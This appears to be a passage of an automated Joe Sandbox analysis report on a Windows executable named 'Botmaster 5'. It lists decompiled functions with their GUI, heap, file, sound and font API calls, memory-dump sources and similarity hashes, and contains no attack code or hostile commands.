                                                                                                                                                                                                                  Function 00422D64 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00422D8F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,?), ref: 00422DB7
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,00000001,?), ref: 00422E0B
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00422E11
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_3State), ref: 00422E2B
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00422E87
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$LongPropWindow
                                                                                                                                                                                                                  • String ID: PB_3State
                                                                                                                                                                                                                  • API String ID: 349397676-216037111
                                                                                                                                                                                                                  • Opcode ID: c895334591e14d6fc9ba0e27baa6dd6450bd5d3f8fcfb6f614d8d5e2d6bfe92e
                                                                                                                                                                                                                  • Instruction ID: 9a0a62d09fd3c698eb09a5c73a713dca6feee7beb140cad56ad34d0ee8462291
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c895334591e14d6fc9ba0e27baa6dd6450bd5d3f8fcfb6f614d8d5e2d6bfe92e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9231AC30A00359ABEF258F54DD49BEEBBF4BF08344F54011AE980B62E0C3F99944DB69
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004264BC Relevance: 12.2, APIs: 8, Instructions: 210COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ceil$floormalloc$fabs
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2390561812-0
                                                                                                                                                                                                                  • Opcode ID: 32e16ad4c970834c457be0c70237291806a55ed0871c026fef78ee7fef33acc4
                                                                                                                                                                                                                  • Instruction ID: ed63b2e9aba936e4bdbc65b774b4d8cf8b3742832a1b817c8077d2c62f9d8105
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32e16ad4c970834c457be0c70237291806a55ed0871c026fef78ee7fef33acc4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96610871E0052AEBCF05BF94F5852ADBBB4FF08354F62489EE4C172241DB398864CB98
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B910 Relevance: 12.1, APIs: 8, Instructions: 135memoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(009A0000,00000000,00001000,?,?,00464CAB,00000000), ref: 0041B925
                                                                                                                                                                                                                  • ReadFile.KERNEL32(009A1000,00000000,00000001,009A1000,00000000,009A1000,?,?,?,00464CAB,00000000), ref: 0041B97F
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(009A0000,00000008,00000000,00000000,?,00000000,00000001), ref: 0041B9AF
                                                                                                                                                                                                                    • Part of subcall function 0041BC80: memcpy.MSVCRT ref: 0041BCCC
                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041BA06
                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,000000FF,00000000,00000001,?,?,00000001,?,00000000), ref: 0041BA28
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,009A1000,?,?,?,00464CAB,00000000), ref: 0041BA46
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,?,?,00464CAB,00000000), ref: 0041BA64
                                                                                                                                                                                                                  • HeapFree.KERNEL32(009A0000,00000000,00000000,?,?,00464CAB,00000000), ref: 0041BA70
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileHeap$AllocByteCharMultiReadWide$FreePointermemcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1800353819-0
                                                                                                                                                                                                                  • Opcode ID: c556244acc4f9c4e96262943c8629f815f5ac9cf2dbf2ad5f5e21e98a191eed7
                                                                                                                                                                                                                  • Instruction ID: 42bc25b2ff0f42eb907fd2414cdd6803dcd61f73db5bec3be59a1033b00bf168
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c556244acc4f9c4e96262943c8629f815f5ac9cf2dbf2ad5f5e21e98a191eed7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441E671244341ABD720DB54DC45FE77BA8EB85750F10461EF690572C0E7B89C89CBAB
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421B30 Relevance: 12.1, APIs: 8, Instructions: 54COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000133), ref: 00421B51
                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00421B71
                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00421B89
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00421B91
                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00421B99
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00421BA1
                                                                                                                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 00421BA5
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00421BB7
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Color$BrushEnabledTextWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3110319690-0
                                                                                                                                                                                                                  • Opcode ID: 4b983592e91349e310d6eeb4d8d577d121232f9fbb8c3f840aae66d4934a0ec4
                                                                                                                                                                                                                  • Instruction ID: 01bbfb132f67c50e0d5d67a5ee4db457d1793f9685d1eaab3b3aefb3298dca79
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b983592e91349e310d6eeb4d8d577d121232f9fbb8c3f840aae66d4934a0ec4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87118630200314AFD6205F24EC48E27B7BDEB54721F40072BF966926E1EBB4BD058E26
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F2F9 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040F303
                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040F311
                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040F318
                                                                                                                                                                                                                    • Part of subcall function 004285D0: HeapAlloc.KERNEL32(00000008,00000000,00427E3F,-00000010,?,?,00427779,00001000,?,?,0041CB5B,FFFFFFFF,UxTheme.dll,00000000,00000000,0041CB18), ref: 004285DC
                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040F335
                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0040F344
                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040F352
                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 0040F35D
                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0040F36E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3383493704-0
                                                                                                                                                                                                                  • Opcode ID: 74a4b4a432fa725979dddaf4cff853a806e900dbb444ee14bd104b1150275a0b
                                                                                                                                                                                                                  • Instruction ID: e626d510dd829e30e3c3c80dedfc0abeb62b7cc499991a537ab5a5cf685bd687
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74a4b4a432fa725979dddaf4cff853a806e900dbb444ee14bd104b1150275a0b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F0196312043009AD730AB74AC48B5BBBD8AB55F64F14403EE995E26D1EBF4A844926A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004480CA Relevance: 10.9, APIs: 7, Instructions: 378COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _strftime
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1867682108-0
                                                                                                                                                                                                                  • Opcode ID: 0138aa10551e778e526a13a4d80bee775beb287e466c698313f6aa2672b56edb
                                                                                                                                                                                                                  • Instruction ID: 32ea1ee96d1743408c4fc68ebaf32c11a364301341dedb47dca1602cf202469c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0138aa10551e778e526a13a4d80bee775beb287e466c698313f6aa2672b56edb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6D19A71900209BBFB219F65CC44BAF7AA1FB04740F10811FF91AA6690DF79CA51DB5E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040E8B3 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 203memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EA57
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000001,00000000,?,?,?,?,?,?,0040EAFA,00000000,00000000,00000000,00000000,0040E498,?), ref: 0040EAD7
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FreeHeapmemcpy
                                                                                                                                                                                                                  • String ID: $$RIFF$data$fmt
                                                                                                                                                                                                                  • API String ID: 673829100-2853923887
                                                                                                                                                                                                                  • Opcode ID: 04637986f0d386a1c9be30bb5686464e6c8faf6422d72898e4b989c755f4dea6
                                                                                                                                                                                                                  • Instruction ID: c16ba46eee8ee786a6198b4eb84b9e50f927162bd0abae0878e84db04415e07f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04637986f0d386a1c9be30bb5686464e6c8faf6422d72898e4b989c755f4dea6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82718271A00219AFCB10DF66CC44E9EBBB9FF88308F14847AF805AB291D7759D11CB55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040DE80 Relevance: 10.6, APIs: 7, Instructions: 92memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heapfreadfseek$AllocFreeftell
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1109645428-0
                                                                                                                                                                                                                  • Opcode ID: c05d0a5cea016df3e98a49c43b30251cb3a93ba6188b894e94a037da7b9f5c75
                                                                                                                                                                                                                  • Instruction ID: aa9e2b37f0981d50ad8793c2b20218d03c3697f452acff9f12a9ae1562451c1c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c05d0a5cea016df3e98a49c43b30251cb3a93ba6188b894e94a037da7b9f5c75
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F03173B1A00B059BC730DF96D880E23B3B9EB88710B108A2FF55657690D7B5F854CBA5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040E2C4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000020,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000,00000000), ref: 00427F5D
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000000,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000), ref: 00427F88
                                                                                                                                                                                                                  • log10.MSVCRT ref: 0040E2F5
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(DSOUND.DLL,00000024,00000040,Function_0000E7F7,?,00000000), ref: 0040E34B
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DirectSoundCreate), ref: 0040E360
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocHeap$AddressLibraryLoadProclog10
                                                                                                                                                                                                                  • String ID: $$DSOUND.DLL$DirectSoundCreate
                                                                                                                                                                                                                  • API String ID: 1619081109-3098100545
                                                                                                                                                                                                                  • Opcode ID: 52deaf4fa1abc37cb152c58339a1e1969c3b51433281450bfc7e181820513610
                                                                                                                                                                                                                  • Instruction ID: 55b5817952215f5fb67e825375cfd331bded47e38f4f7743614ecfd7dcde42d2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52deaf4fa1abc37cb152c58339a1e1969c3b51433281450bfc7e181820513610
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 213181B1A00304DBD7049FA6DC85A6E7BB8FB04308F10583AE505E7292EBB8D864CB5D
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041082B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004108A6
                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004108D1
                                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000000), ref: 004108DB
                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000), ref: 004108E4
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004108FE
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Create$CapsDeleteDeviceFont
                                                                                                                                                                                                                  • String ID: DISPLAY
                                                                                                                                                                                                                  • API String ID: 3799541643-865373369
                                                                                                                                                                                                                  • Opcode ID: 08a8b22598c7ff631792eb3f599ba0dda0bee56becf3d837f9024b69761a2825
                                                                                                                                                                                                                  • Instruction ID: 36c06f0676af170f0957ae48198ae26a1061d087e2dd5ac3b5bc7b5a374c064a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08a8b22598c7ff631792eb3f599ba0dda0bee56becf3d837f9024b69761a2825
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37219E71900219BBDF21AFA9CC48AEF7FB9EF49391F104016F611A6290DBF44980CBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004273BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 004273D3
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00427405
                                                                                                                                                                                                                  • CreateDIBSection.GDI32(00000000,00000028,00000000,00000000,00000000,00000000), ref: 0042741D
                                                                                                                                                                                                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 00427433
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00427457
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
